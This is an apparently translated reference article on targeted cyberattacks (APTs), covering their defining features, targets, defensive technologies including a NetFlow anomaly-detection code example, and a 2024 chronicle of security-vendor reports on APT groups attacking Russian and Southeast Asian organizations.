2024/11/29 15:52:21

Advanced Persistent Threat (APT): Targeted Cyber Attacks ("Advanced Sustained Threat")

The distinguishing feature of targeted attacks (APT) is that the attackers are interested in a particular company or government organization. This sets the threat apart from mass hacker attacks, in which a large number of targets are attacked at the same time and the least protected users become victims. Targeted attacks are usually well planned and involve several stages, from reconnaissance and deployment to the destruction of traces of presence. As a rule, as a result of a targeted attack the attackers gain a foothold in the victim's infrastructure and go unnoticed for months or even years; throughout this time they have access to all corporate information.


Classification difficulties

Targeted attacks are attacks directed at specific commercial organizations or government departments. As a rule, such attacks are not widespread and are prepared over a fairly long period. Attackers study the information systems of the target and find out which software is used for which purposes. The objects of the attack are specific information systems and/or people, narrowly limited by some scope or goal. Malware is developed specially for the attack so that the standard antiviruses and defenses used by the target, which the attackers have studied well, cannot detect the threat. Most often this involves zero-day vulnerabilities and special algorithms for communicating with the perpetrators or customers of the attack.

Yuri Cherkas, head of infrastructure information security solutions at the Information Security Center of Jet Infosystems, believes that the almost constant controversy surrounding the definition of the term "targeted attack" makes it difficult to classify this term. He notes that the targeted attack uses the same hacking mechanisms as any other (spam, phishing, infection of frequently visited sites, etc.). "In my opinion, one of the main signs of a targeted attack is its clear focus on a specific organization. For example, a virus written for specific software developed by a specific organization. But this does not always happen. A hacker can use the exploit kits he has and other tools to attack the victim company. In this case, it is quite difficult to determine whether the attack is targeted, since vulnerabilities of common OS and application software were used to carry out the attack," says Yuri Cherkas.

Difficulties in qualifying targeted attacks are one of the factors that do not allow calculating even their approximate number.

NOS (Complex Long-Term Threats)

Cybercrime category with business and policy goals

Most experts agree on the following features of targeted attacks[1]:

  • These are attacks aimed at specific commercial organizations, industries or government departments.
  • The objects of the attack are specific information systems, narrowly limited by some scope or purpose.
  • These attacks are not widespread and are prepared over a fairly long period.
  • Malware, if used in the implementation of an attack, is specially developed for a specific attack so that standard defenses, well-studied by attackers, cannot detect its implementation.
  • Zero-day vulnerabilities can be used to implement the attack.
  • Typically, targeted attacks are used to steal information that is easy to monetize, or to disrupt availability to critical information.
  • When carrying out a targeted attack, the same hacking mechanisms are used as in mass attacks, in particular phishing. The difference is the preparation of an attack in order to prevent the possibility of its detection by means of protection. It is in relation to targeted attacks that phishing becomes a very relevant threat, since the attack in this case is carried out not on abstract, but on specific individuals, which can be taken into account by social engineering methods.
  • Once a targeted attack has been detected and identified from the results of its implementation, its threat becomes known and moves into the "mass" category: attackers can now use it on a mass scale. At the same time, once identified, the threat of this attack can be detected by means of protection, one of whose tasks is to minimize the time it takes for an attack threat to move from the targeted category to the mass category.

Target Attack Phases

Course of APT attack

Attack targets

According to A.T. Kearney:

  • Company Board Office. Often, the equipment is improperly protected from physical damage (for example, from cleaning or maintenance personnel).
  • R&D. This is usually the department that requires the highest level of protection, but often it is no better protected than other departments.
  • Data centers provide a reliable environment for hosting a private cloud. The problem is ensuring the safe operation of numerous servers, as well as applications running on these servers.
  • Network of suppliers. Due to the expanding application of network solutions when working with suppliers, there are risks associated with the fact that relatively small supplier companies are generally less protected.
  • Cloud computing. Basically, it is safe to use an external cloud. The problems are related to the fact that the level of data protection depends on the law and that access from the special services is possible.
  • Production. Many old specialized systems are increasingly combined into networks, and their work is difficult to track and control. Malicious attacks in this case can lead to production losses or even to the collapse of the company.
  • Databases provide secure storage of sensitive information. The main weakness is that hackers can use administrators as "tools" for penetrating databases.
  • End products activated with information technology. The increasing use of network solutions to ensure the functioning of end products facilitates cyber attacks. By remotely monitoring user devices in order to provoke breakdowns, hackers have the opportunity to illegally receive confidential information through these devices. In this regard, the company may face the loss of reputation and claims from users who are victims of fraud.
  • Office networks. The growing level of network interaction, involving the unification of almost all systems, provides a hacker with rich opportunities if he can penetrate the network.
  • Sales. Leaking marketing plans, pricing and customer information undermines the company's reputation and robs it of competitive advantage.
  • Mobile devices. When buying smartphones available in the commercial market, users often enter confidential data into their memory, which, as a rule, can be easily stolen by hackers. The most tested and reliable security concepts can be useless if the company's employees use their own mobile devices to solve work tasks.
  • Online retailers. To illegally access under the guise of real buyers and commit fraudulent actions, hackers use credit card details and personal data of customers.
  • Phone calls. By exploiting people's willingness to help each other, attackers can use phone calls as a way to easily get the information they need.

Targeted attacks in the financial sector

The review of unauthorized transfers of funds in 2014, published by the Central Bank of the Russian Federation the day before, notes that 23 credit organizations reported incidents with signs of targeted attacks. Experts calculated that the incidents were aimed at writing off funds in the amount of 213.4 million rubles.

All incidents are related to the external impact on the IT infrastructure, including the introduction of malicious code, thanks to which high-tech criminals intended to withdraw funds.

The hacking attempts share typical features: the attack was targeted and took into account how messages are sent and processed in a particular payment system; in some cases the malicious code was not detected by standard anti-virus tools despite up-to-date anti-virus databases; and cases of hackers penetrating banks' local networks were also recorded, including through attempts to inject malicious code via electronic messages.

Representatives of banks state: if earlier fraudsters preferred to rob customers, now they have switched to larger production, namely to the financial and credit institutions themselves.

"It's a more complicated procedure, but in terms of benefits, it's more convenient for hackers to hack into banks where money is in one place. The main trend is the so-called targeted attacks. They are prepared for months and in relation to specific banks and financial organizations. This is a real threat from which it is very difficult to protect even banks advanced in terms of information security. The attackers have studied banking software, ABS, protective equipment and so on quite well," said Yuri Lysenko, head of the information security department of Home Credit Bank.

Stanislav Pavlunin, vice president of security at Tinkoff Bank, agrees with him: "Targeted attacks go side by side with social engineering. DDoS attacks have not disappeared anywhere, but working with them is much easier than with viruses that attackers write for targeted actions. Standard antiviruses do not detect malicious objects that are written for the attack object. Systems that allow you to record such targeted attacks on a specific financial organization and identify risks on the fly are a different security class," says Stanislav Pavlunin.

At the same time, Yuri Lysenko predicts an increase in the number of targeted attacks on specific banks and financial organizations, remote banking systems, etc.

Target Attack Techniques

Publicly available information about the means of conducting targeted attacks and incident investigation (which have signs of targeted attacks) allows us to talk about a variety of methods. For example, fully automated methods can be used, as well as phone calls.

Attackers during the attack explore various possibilities to gain access to the necessary information. Direct physical access can be carried out or employees of the company, their devices and accounts in Internet services can be attacked.

"A significant problem is the security of related information systems - vendor companies (especially software developers supporting their product) and customers. Trusted relationships with them can be used to bypass boundary defenses. This significantly expands the already complex perimeter of protection," says Alexey Kachalin, Deputy General Director of Promising Monitoring.

The victim is unlikely to be able to get away from attempts at targeted attacks. For example, an attacker wants to gain access to the internal resources of the company of interest to him. For this purpose, an attacker can initiate many targeted attacks, over several months or years. All attack elements (network attacks, malware) can be pre-checked for "visibility" for common detection methods. In case of inefficiency, such elements are modified. Similar to updating antivirus databases, intrusion tools can be updated, including those that are already operating in the captured system.

An additional difficulty is the duration and intensity of the targeted attack. Preparation can take months, and the active phase can take minutes. "There is a possibility that sooner or later the attack will succeed. In the end, the problem of 0-day vulnerabilities is always relevant. If you have information that costs 100 million, then be prepared for the fact that there is someone ready to spend 50 million to steal it. Therefore, the only thing that can be done is to be ready for compromise and have tools for quickly detecting an attack, suppressing it and minimizing damage," said Alexander Gostev, chief antivirus expert at Kaspersky Lab.

Establishing the organizers

Most of the targeted attacks are detected after the fact. The biggest problem remains attribution - the establishment of the organizers and perpetrators of such attacks.

Identifying the culprit is an extremely difficult task, experts are sure. It requires collecting as many factors as possible that would indicate the involvement of a hacker group of a certain nationality or organization in the crime. This in turn requires interaction between information security companies, victims, law enforcement agencies of different countries, and so on. Even then, only a few culprits are identified, most often because of gross errors by the attackers.

"Many factors must be considered to determine the source of the attack. First of all, this is an analysis of the code - it may contain words that indirectly indicate the language or nationality of the authors. For example, Russian words written in Latin, or errors that are usually characteristic of Russian authors, etc. However, cybercriminals can deliberately leave such false traces, thereby confusing the investigation," said Alexander Gostev.

More than 100 groups purposefully attack commercial and state organizations

Experts from the Kaspersky Lab Global Center for Threat Research and Analysis reported in the summer of 2016 that more than 100 groups organizing cyber espionage and APT-class attacks are active in the world, and that commercial and government organizations in 85 countries are targeted.

According to company representatives, such a dynamic development of this threat suggests that targeted attacks have ceased to be the lot of the chosen ones: attackers optimize their equipment and tools, and this reduces the cost and simplifies the organization of a malicious campaign, which, in turn, contributes to the emergence of new players.

The main purpose of an APT-class attack is to steal confidential information, which can subsequently be used to gain geopolitical advantage or be sold to interested parties. According to Kaspersky Lab's observations, government and diplomatic organizations, financial companies, enterprises operating in the energy and space industries, health and education institutions, telecommunications and IT companies, suppliers for the armed forces, as well as public and political activists are most at risk of becoming a victim of a targeted attack.

"We have been studying complex targeted attacks for more than six years and can say with confidence that recently they have been increasingly used not only for espionage, but also for theft of money. Targeted attacks affect a variety of organizations, their victims can be not only government agencies. Of no less interest to cybercriminals are large companies that have valuable intellectual property or have access to large financial assets," said Yuri Namestnikov, head of the Russian research center at Kaspersky Lab. "In such a situation, early detection of a targeted attack is critical for any organization that wants to keep its sensitive data. However, with traditional security solutions, this is very difficult to do, since attackers often use non-trivial methods and carefully hide their activity. So companies can be helped by either analytical services or special solutions to identify targeted attacks."

Methods to Protect and Prevent Attacks

The main means of protection against targeted attacks today are means of detecting all kinds of anomalies (code, commands, behavior, etc.). At the same time:

  • Anomaly detection within a single computer, or across the corporate information system as a whole, is carried out in order to detect attacks that have been carried out, whether partially or fully.
  • Known attacks can be neutralized at early stages of their implementation. Here the information protection task is solved: the detected anomaly can be unambiguously identified as an attack event, so an automatic response to it is possible.
  • For unknown attack threats, which include targeted attacks, anomaly detection inevitably involves errors of the first kind (during surface analysis of events) and of the second kind (during deep analysis). In this case, especially in deep analysis (and otherwise there is no point in detecting anomalies), it is technologically impossible to unambiguously identify the detected anomaly as an attack event, so an automatic response is impossible to a registered event that is an attack only with some probability. The task of anomaly detection then comes down not to protecting information but to further investigating the recorded event in order to identify the attack as quickly as possible.
  • Once the anomaly has been unambiguously identified as an attack (the attack becomes known, and its threat is no longer a targeted threat but a mass one), the anomaly detector itself provides information protection against this attack.


Almost all vendors have a product in their line that is positioned as a means of protecting against targeted attacks. These include FireEye, CheckPoint, McAfee, etc. The effectiveness of protection against targeted attacks cannot be fully determined only by the technical means used.

"If we talk about technical means, then their effectiveness will be considered through the prism of the goals and objectives set by the company, which is better to evaluate as part of pilot projects in a specific environment. Like any solutions, products for protection against targeted attacks have both their strengths and weaknesses," said Alina Sagidullina, information security consultant at LANIT-Integration.

Information security monitoring centers have the ability to quickly respond to targeted attacks. Such centers can comprehensively analyze the state of the attacked system through information protection systems; with the help of experts focused on information security analysis in the observed system; when monitoring the facts of compromise and information leakage; aggregate analysis of large information systems. "This allows you to see similar signs of anomalies in various segments of the information system," says Alexey Kachalin.

Technologies for protecting against targeted attacks existed before, but now they are reaching a new level. First of all, we are talking about various tools for detecting anomalies, both on local computers and at the level of network activity. The task of such systems is to look for everything unusual that happens, not to look for malicious code. This is because in many cases attackers may not use malware at all.

"To these systems is added the actively developing class SIEM - 'Security information and event management', which allows you to aggregate incoming system events from different security systems (antiviruses, firewalls, emulators, routers, etc.) and see in real time all the changes taking place," says Alexander Gostev.

Why Traditional Security Systems Are Not Enough

Due to the specifics of targeted attacks and preparation for them, such as:

  • a detailed study of the protective equipment used in order to bypass them;
  • writing unique software and fixing it in the target infrastructure;
  • use of trusted but compromised objects in attacks that do not create a negative background;
  • multivector approach to penetration;
  • stealth, etc.

Due to the inherent technological limitations of traditional means of protection:

  • detection is aimed only at common (simple) threats, already known vulnerabilities and methods;
  • no built-in mapping and correlation of detections into a single chain of events;
  • there are no technologies for detecting deviations in normal activities and analyzing the operation of legitimate software.

An integrated approach is needed

Deception-traps

New tools have appeared and continue to appear. However, their effectiveness directly depends on the quality of their customization. According to Yuri Cherkas, the main technological directions of protective equipment are:

  • sandboxes that mimic the organization's workstations. In sandboxes, files received from the Internet are launched and analyzed. If the file being run entails a destructive effect, then such a file is defined as infected;
  • analysis of abnormal network activity (for example, based on NetFlow), which is carried out by comparing the current network activity with a previously built reference model of network behavior. For example, a computer or server that always communicates with a certain set of network resources over certain protocols suddenly begins to try to access databases directly;
  • behavioral analysis of workstations, also based on comparison of workstation activity with reference model. The difference is that this analysis is carried out not at the network level, but at the workstation level itself using agents. Not so long ago, an interesting technology appeared that monitors Windows processes. In case of deviation from the reference model, the Windows process is blocked, thereby preventing the exploit from performing a destructive effect.
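
The NetFlow comparison described in the list above, as an added example (not code from the article or from any vendor product): a reference model is learned per source host and current flows are checked against it. Host names, the database port list, the `min_count` threshold and the severity labels are all assumptions chosen for illustration, and the flow records are constructed.

```python
from collections import Counter, defaultdict
from typing import NamedTuple


class Flow(NamedTuple):
    src: str
    dst: str
    dst_port: int
    proto: str


# Assumption: default ports treated as "direct database access".
DB_PORTS = {1433: "MSSQL", 1521: "Oracle", 3306: "MySQL", 5432: "PostgreSQL"}


def build_reference_model(flows, min_count=2):
    """Learn, per source host, the (dst, port, proto) tuples seen at least
    min_count times, so one stray flow in the learning window is not 'normal'."""
    model = defaultdict(set)
    for flow, seen in Counter(flows).items():
        if seen >= min_count:
            model[flow.src].add((flow.dst, flow.dst_port, flow.proto))
    return dict(model)


def classify(model, flow):
    """Return None when the flow matches the model, else (severity, reason)."""
    known = model.get(flow.src)
    if known is None:
        return ("medium", "source host has no reference profile")
    if (flow.dst, flow.dst_port, flow.proto) in known:
        return None
    talks_to_db = any(port in DB_PORTS for _, port, _ in known)
    if flow.dst_port in DB_PORTS and not talks_to_db:
        # The article's case: a host that never used a database directly.
        return ("high", f"first direct {DB_PORTS[flow.dst_port]} access from this host")
    if any(dst == flow.dst for dst, _, _ in known):
        return ("medium", "new service on a known destination")
    return ("low", "new destination")


def detect_deviations(model, flows):
    """Return one alert per distinct deviating flow, in order of first sight."""
    alerts = {}
    for flow in flows:
        verdict = classify(model, flow)
        if verdict is not None:
            alerts.setdefault(flow, verdict)  # repeated flows alert once
    return [(flow, sev, why) for flow, (sev, why) in alerts.items()]


# Constructed learning-window flows (not real traffic).
BASELINE_FLOWS = (
    [Flow("ws-017", "proxy01", 3128, "tcp")] * 3
    + [Flow("ws-017", "fs01", 445, "tcp")] * 2
    + [Flow("ws-017", "dc01", 53, "udp")] * 2
    + [Flow("app01", "db01", 5432, "tcp")] * 3
    + [Flow("ws-017", "db01", 5432, "tcp")]  # one-off, below min_count
)

# Constructed flows from the monitored period.
CURRENT_FLOWS = [
    Flow("ws-017", "proxy01", 3128, "tcp"),
    Flow("ws-017", "db01", 5432, "tcp"),
    Flow("ws-017", "db01", 5432, "tcp"),
    Flow("app01", "db01", 5432, "tcp"),
    Flow("ws-017", "fs01", 3389, "tcp"),
    Flow("ws-017", "print02", 9100, "tcp"),
    Flow("ws-099", "dc01", 53, "udp"),
]

if __name__ == "__main__":
    reference = build_reference_model(BASELINE_FLOWS)
    for flow, severity, reason in detect_deviations(reference, CURRENT_FLOWS):
        print(f"{severity:6} {flow.src} -> {flow.dst}:{flow.dst_port}/{flow.proto}  {reason}")
```

The low-severity "new destination" alert for a printer is the kind of first-kind error the article says behavior analysis cannot avoid, which is why the result is ranked for an analyst rather than blocked automatically.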

"The nuance is that all these technologies involve behavior analysis. In this case, errors of the 1st (false positives) and 2nd kind (false negatives) are inevitable, so efficiency strongly depends on the qualifications of employees who configure and exploit these solutions," notes Yuri Cherkas.

Targeted Attack Protection Components

Deception - a network of masked network traps and decoys that are scattered throughout the IT infrastructure

How an attacker acts: Hackers on your network are constantly moving towards their goal

What Deception will provide

  • Real-time detection of targeted and zero-day attacks
  • Protect real IT assets by switching attacker activity to traps
  • Protecting valuable data from "ransomware"
  • Collection of penalties about the actions of intruders
  • No false positives
  • Does not use agents or affect users and IT services

Targeted Attack Protection Components

Results

  • Attacker Profile
  • Detailed methods and tools used during an attack
  • In-depth analysis (what goals hackers are pursuing, what information they are looking for)
  • History and timeline of the hack
  • Sources of origin of attackers based on their IP addresses and DNS data

Damage from attacks is a big mystery even for victims

Calculating the real damage from targeted attacks does not seem feasible: according to ESET, 66% of security incidents go unnoticed for many months. This is exactly what complex malicious software for targeted attacks is designed for: data theft occurs imperceptibly, in "background" mode.

A large number of attacks go unnoticed. When found, many companies try to hide the fact of the incident and not make it public. Kaspersky Lab believes that at least one high-profile target attack becomes known in the world every week. In reality, more than a hundred such high-profile attacks can occur a week.

In a 2013 FireEye study, 39.5 thousand unique incidents were detected by their devices, 4.1 thousand attacks were associated with APT. At the same time, Russia was not included in the TOP-10 of countries targeted by most APTs. This can most likely be explained by the data sources used.

The number of targeted attacks in the world at the end of any year is quite difficult to estimate. Alexander Gostev notes that tens of thousands of incidents with targeted attacks can be committed in the world per year. "Russia is in a global trend and large Russian companies and government agencies, according to my estimates, are subjected to attempts at targeted infection at least once a month," he notes.

Chronicle

2024

TaxOff group uses complex backdoor in attacks on Russian public sector

Specialists of the Threat Research Department of the Positive Technologies Security Expert Center (PT Expert Security Center) have discovered an APT group that attacks organizations of the Russian public sector. In a recorded series of incidents, the attackers used phishing emails on financial and legal topics to penetrate the IT infrastructure, which is why the experts named the group TaxOff. The cybercriminals used a high-tech backdoor in the attacks, which can remain invisible even when performing many tasks at the same time. Positive Technologies reported this on November 28, 2024.

The group pursued two main goals - espionage and consolidation in the infrastructure to develop further attacks. Experts found several phishing emails that were used as initial penetration vectors. One of them had a link to cloud storage with malicious content, the other - a fake installer of special software for civil servants, designed to fill out various certificates.

Interacting with the emails led to infection with a complex backdoor, which the experts called Trinper. The malware is written in C++ and has a multithreaded architecture, which allowed it to perform various actions in parallel: collect and upload data, monitor the file system for sensitive data, and communicate with the command and control server. The backdoor implements a configuration mechanism that allows Trinper to be set up flexibly. In addition, the backdoor caches frequently used data and thereby performs operations faster, increasing its performance.

"Thanks to multithreading and other architectural features, Trinper gives attackers the ability to gain steady access to compromised systems and simultaneously perform numerous malicious actions. At the same time, the backdoor does not have a significant impact on infrastructure performance, so it can go unnoticed for a long time," said Vladislav Lunin, senior specialist at the Complex Threats Research Group, a security expert center at Positive Technologies. "Combining high-tech malware with bait on exciting topics makes TaxOff attacks especially dangerous and difficult to detect. This highlights the need to regularly raise awareness among organization employees of current cyber threats and build tiered protection against complex incidents."

In order not to become victims of such attacks, experts advise users to comply with the standard rules of cyber hygiene: carefully read emails from any senders, do not open suspicious attachments and do not follow dubious links, even if the topics of messages are extremely relevant. Experts recommend that companies carefully check network traffic in order to detect hidden cyber threats in a timely manner.

APT group PhaseShifters attacks Russian companies with steganography

Specialists from the Threat Research Department of the Positive Technologies Security Expert Center (PT Expert Security Center) have discovered attacks aimed at Russian state institutions, industrial companies and research centers. The company announced this on November 1, 2024. Dozens of organizations became victims. The attackers used the increasingly popular steganography technique, which allows malware to be hidden in forwarded images and text files. Experts note that the cybercriminals almost exactly repeat the attack scenarios of the TA558 group, which Positive Technologies reported on in April 2024.

According to PT ESC experts, the discovered facts of attacks were carried out by a well-known espionage group, whose attention is directed to various industries in Eastern Europe, including government agencies, the economy and industry. Positive Technologies experts attributed the attacks as committed by the PhaseShifters group (also known as Sticky Werewolf). In their attacks, the group uses phishing: attackers send letters allegedly from officials asking them to familiarize themselves with the document and sign it. As a result, malware such as Rhadamanthys, DarkTrack RAT, Meta Stealer, and others hit devices.

The cyberattacks began with phishing emails carrying attachments in the form of password-protected archives that contained malicious files. The study examined dozens of documents, among which there were, for example, summaries or additional agreements for signature. When the victims opened the files, scripts that download images were downloaded to their devices; the payload was hidden in the images using steganography. Experts suggest that PhaseShifters could have borrowed this technique from the TA558 group, which attacks organizations around the world by November 2024. Further analysis of the attack chains led the researchers to an even more interesting conclusion. The same technique and the same crypter are used by UAC-0050 (UAC-0096), a group that, according to a number of researchers, has been attacking organizations in Russia, Ukraine, Poland, Belarus, Moldova, and the Baltic countries since 2020.

"We have seen high activity of the PhaseShifters group since the spring of 2023 (other Russian researchers later called it Sticky Werewolf) and even then noticed interesting details. The attacks of the group by technique are identical to the chains of attacks of another group - UAC-0050. Moreover, the attacks of these groups take place with a short time period, that is, the attackers attack equally within a few weeks," said Denis Kuvshinov, head of the TI department of the Positive Technologies security expert center. "We tend to believe that UAC-0050 and PhaseShifters are the same group, but this can only be confirmed after a longer observation."

Experts at the Positive Technologies security expert center recommend that users take a closer look at letters with attachments, even if they are sent on behalf of well-known companies or government organizations. Companies should closely monitor network traffic, as well as check suspicious activity related to legitimate services, especially using PowerShell command shells, CMD and scripting environments, such as WScript.

Cybercriminals attack the public sector, telecommunications and military-industrial complex of Southeast Asian countries

Positive Technologies on July 25, 2024 published a study of the activities of APT groups attacking organizations in Southeast Asia. The Philippines and Vietnam accounted for the most attacks in the region. The three most attacked industries in the region included government agencies, telecommunications companies and the military-industrial complex.

According to the study, the top 5 countries in the region in terms of the number of attacking APT groups include the Philippines (85%), Vietnam (85%), Thailand (70%), Malaysia (70%) and Indonesia (60%).

"Southeast Asia is an important territory both in terms of the global economy and geopolitics. We analyzed the activities of 20 APT groups that attacked Southeast Asia for the period from January 2020 to April 2024. All of them are aimed at state organizations in the region. Telecommunications companies are also under attack, they are attacked by 60% of APT groups, respectively, and every second group takes actions aimed at organizing the military-industrial complex. In addition, more than a third of cybercriminal groups are attacked by enterprises from the fields of science and education (45%), industry (40%) and finance (35%)," said Yana Avezova, senior analyst at the Positive Technologies research group.

Telecommunications is also under scrutiny by attackers, including through the proliferation of 5G technology in the region. With the pace of technology adoption in Southeast Asia outpacing that of cybersecurity, the rapid rollout of 5G telecommunications could increase the rise of cyberattacks on the industry.

As Positive Technologies analysts found out, three-quarters of the APT groups investigated start cyber attacks with phishing mailings, and half of them exploit vulnerabilities in public-facing systems, such as Microsoft Exchange servers. Phishing campaigns, according to the study, are often timed to events significant for the region, including ASEAN summits. A number of APT groups (30%) use a watering hole attack as an initial step, placing scripts on websites that quietly download malware to visitors' computers.

Having penetrated the network, attackers begin to explore the environment in which they find themselves. According to Positive Technologies experts, the majority (80%) of APT groups seek to identify users of compromised nodes. This information can be used to elevate privileges or to advance through the infrastructure. Of the APT groups examined, 70% collect network configuration data and browse files and directories for useful information. Another 60% of APT groups study the processes running on the node, which helps them get an idea of the installed protections.

The arsenal of the APT groups studied by the experts contains many tools, including unique software of their own design. At the same time, all of them use legitimate tools that are already present in the compromised system. This allows them to disguise their actions as those of IT staff and avoid detection. For instance, 70% of APT groups use Cobalt Strike, commercial software that was created as a penetration testing tool but whose extensive functionality is now actively exploited by cybercriminals. For example, the Earth Longzhi subgroup of the APT41 group, in attacks on organizations in the Philippines, Thailand, Malaysia and Indonesia, used special versions of Cobalt Strike loaders with complex anti-detection mechanisms. Together with other techniques, this allowed the attackers to remain unnoticed in the victims' infrastructure from September 2021 to June 2022.

To combat complex targeted attacks and build an effective defense system, Positive Technologies experts recommend that organizations pay attention to the basics of an effective cybersecurity approach, which include:

  • inventory of IT assets;
  • monitoring and response to incidents;
  • improving employee cyber literacy;
  • security assessment.

APT group HellHounds attacks Russian organizations for the third year in a row

On May 23, 2024, Positive Technologies experts published the results of their latest study of the activities of the HellHounds APT group, which is actively attacking Russian organizations in critical areas. The number of victims as of May totaled dozens of organizations in such industries as IT, transport, power, etc. Government agencies and aerospace companies were also affected.

Positive Technologies specialists discovered HellHounds in November 2023: even then it was actively attacking the infrastructure of Russian companies using Decoy Dog, a backdoor for Linux. A recent study by the company showed that it also has a Windows version. The first attacks using Decoy Dog for Windows were noted on January 1-2, 2024.

Decoy Dog fragment

Decoy Dog is a derivative of the Pupy RAT open source project. Judging by the samples intercepted by the researchers, the development of Decoy Dog began no later than the end of 2019, and the latest sample is dated January 2024.

Decoy Dog (Windows) Detail Diagram

In turn, the SSL certificates that the backdoor uses to encrypt connections to the command server (remote nodes) are dated 2021-2023. From this it may follow that the campaign against Russian enterprises was launched in 2021.

As for penetration methods, the researchers write that in at least two cases the attackers used the infrastructure of contractors to get into the networks of target organizations. In these cases, credentials for logging in via the SSH protocol were compromised.

There are also cases when attackers disguised Decoy Dog samples as ISO images of the iMind service for online meetings, video conferencing and webinars.

In total, the Positive Technologies study confirmed 48 successful attacks. Attackers are actively attacking Russian IT companies - primarily contractors of critical organizations. Presumably, the attackers are targeting these companies to carry out trusted relationship attacks, the researchers said.

Distribution of victims by industry

"The success of such attacks testifies to the weak or absent protection of affected companies from trusted relationships (their special case)," said Anastasia Melnikova, director of information security at SEQ. - "And this, in turn, is a sign of an uneven attitude towards the information security of the critical infrastructure as a whole. Any system is reliable just as much as its weakest link is reliable. In fairness, 48 successful attacks in three years of targeted activity - not so much, but - much more than it should be."

The attackers manage to maintain a presence in critical Russian organizations for a long time.

"Despite the fact that almost all HellHounds tools are based on open-source projects, attackers manage to modify them with sufficient quality, which contributes to bypassing the means of protection and a long hidden presence in compromised organizations," the researchers noted.[2]

Russian companies are being spied on

The cyber group Sapphire Werewolf rewrote an open-source stealer to spy on Russian companies. Since the beginning of spring 2024, the group has attacked Russian companies more than 300 times. This was announced on May 28, 2024 by the press service of Anton Nemkin, deputy of the State Duma of the Russian Federation.

During the monitoring of cyber incidents, it became known that the Sapphire Werewolf group sent employees of Russian companies phishing letters containing links created with the T.LY shortening service. Users believed that they were downloading an official document, but instead downloaded a malicious file. When they tried to open it, malware whose purpose was data theft (the Amethyst stealer) was installed on the PC, the press service said, citing BI.ZONE.

To avoid arousing additional suspicion, a decoy document was actually opened on the PC at the same time as the malware was downloaded: a decision to initiate enforcement proceedings, a leaflet from the CEC or a decree of the President of the Russian Federation. Meanwhile, Amethyst collected important information from the compromised device: for example, password databases, cookies, browser history, saved pages, text and other documents, BI.ZONE noted.

The danger of stealers is that, being encoded, they can easily bypass antivirus protection. It is due to this quality that this type of attack spreads especially quickly. I think that stealers are one of the key threats to information security for both ordinary users and organizations. At the same time, there are many options for stealers. For example, a stealer can mimic an application or browser extension, or a zip archive. In fact, any downloadable file, - said the deputy.

According to Nemkin, stealers are, as a rule, distributed by means of phishing.

In 2023, the Rare Wolf group of attackers launched at least 90 attacks with a similar scenario, Nemkin recalled.

In addition, it is important to constantly monitor systems for malware, as well as create autonomous backups. Finally, the main preventive measure to prevent such attacks is the development of digital competencies of personnel. It has been noted more than once that phishing is one of the key opportunities for gaining unauthorized access to system data. And the fault of this is the incompetence of employees who not only open suspicious letters, but also follow the links from them, - the deputy explained.

Pro-state group Shedding Zmiy attacked dozens of Russian organizations

Experts from the Solar Group's Cyber Threat Research Center have identified the activities of the highly professional pro-state group Shedding Zmiy, which has been spying on Russian organizations since at least 2022. The hackers have several dozen cyberattacks to their name, against the public sector, industry, telecom and other industries. They used the compromised data in subsequent attacks and also posted it publicly. Solar reported this on May 24, 2024.

From 2022 to May 2024, Solar Group specialists have already investigated seven incidents related to Shedding Zmiy. At first, it seemed that the Cobalt group (exCobalt) was behind the attacks, since its "proprietary" CobInt backdoor appeared in the first incident investigated. However, further investigations revealed a difference in motive. Compared to Cobalt, which aimed for financial gain, the group, later named Shedding Zmiy, was not interested in money - it was hunting for data.

Although Shedding Zmiy tried to act differently in each attack than in the previous one, Solar Group experts quickly began to notice traces of the use of the same malicious techniques, tools, network infrastructure and component names. Based on these signs, seven seemingly different incidents were eventually combined into one cluster under the name Shedding Zmiy. As a result of the work, the specialists of the Solar Group helped the affected organizations get rid of traces of the group's presence and gave recommendations on improving the cyber protection of IT perimeters.

Investigations have shown that the group poses a serious threat to Russian infrastructure. It uses both publicly available malware and unique malware developed for specific targets (including loaders, backdoors and web shells). Sometimes it uses compromised legitimate servers to download malware to the victim's systems. The hackers also exploit a specific vulnerability in ASP.NET that the vendor has not closed: such attacks are difficult to identify and respond to.

In total, experts from the Solar Group found traces of the use of 35 different tools for reconnaissance, malware delivery, stealthy lateral movement within the network and data theft. To penetrate the network, elevate privileges and gain persistence, the attackers exploited 20 known vulnerabilities in common corporate software.

At the same time, Shedding Zmiy knows how to cover its tracks. The group has an extensive network of command servers in Russia, renting resources from various hosting providers and cloud platforms. This helps the hackers bypass the blocking of attacks on a territorial basis (via GeoIP).

Shedding Zmiy also actively resorts to highly professional social engineering. For one of the attacks, the hackers created a fake Telegram profile, posing as a specialist of the information security service, and "asked" a company employee for the password to the account. Using the compromised account, the attackers managed to visit several more hosts, where they placed malware.

In addition, the group was seen exploiting trust relationships between organizations (attacks such as Trusted Relationship). In one of the cases, infecting the telecom provider's network, hackers tried to attack three more organizations by sending several dozen emails with malicious attachments from the hacked network.

In the process of investigations, we found both malicious tools familiar from the activities of the Cobalt group, and unique samples of malware that had not been encountered before. In particular, the Bulldog backdoor and the XDHijack loader. In addition, the group has developed a whole framework for exploiting the VIEWSTATE deserialization vulnerability. All this speaks of the high professionalism of the attackers and the considerable resources that they invest in the development of their arsenal, "explained Anton Kargin, an expert of the malware analysis group at the Solar Research Center.

Asian group Obstinate Mogwai exploits ten-year-old vulnerability in targeted attacks on Russian companies

Experts from the Solar Group's Cyber Threat Research Center blocked the espionage activity of the Asian group Obstinate Mogwai in a telecom operator's infrastructure. Solar Group reported this on May 17, 2024. In the attack, the hackers used an old deserialization vulnerability, not completely eliminated by the vendor, in the ViewState parameter (which controls the state of web pages in the ASP.NET environment developed by Microsoft). It allows any actions to be performed in the attacked system, whether a Microsoft Exchange mail server or an ASP.NET-based web page. At the same time, the very fact of its exploitation is extremely difficult to detect, and the response method has not yet been described in detail in specialized communities.

In late 2023 - early 2024, Solar experts investigated the APT attack of the Obstinate Mogwai group on a Russian telecom company, among whose clients are state authorities. In the course of work, experts found signs of successful exploitation of the ViewState parameter vulnerability, which has been known since 2014. It allows attackers to execute arbitrary code on the system and subsequently steal, replace or spoil data.

The investigation began after the means of protection recorded suspicious activity in the infrastructure of the telecom company. By that time, the attackers were already creating a "bridgehead" for stealing confidential data from the company itself and its customers. Several times, Solar experts found the group's malicious tools in the attacked network and removed them. But after a while Obstinate Mogwai kept returning, until all paths were finally closed to them. For this perseverance, the Solar team named the group Obstinate Mogwai ("stubborn demon").

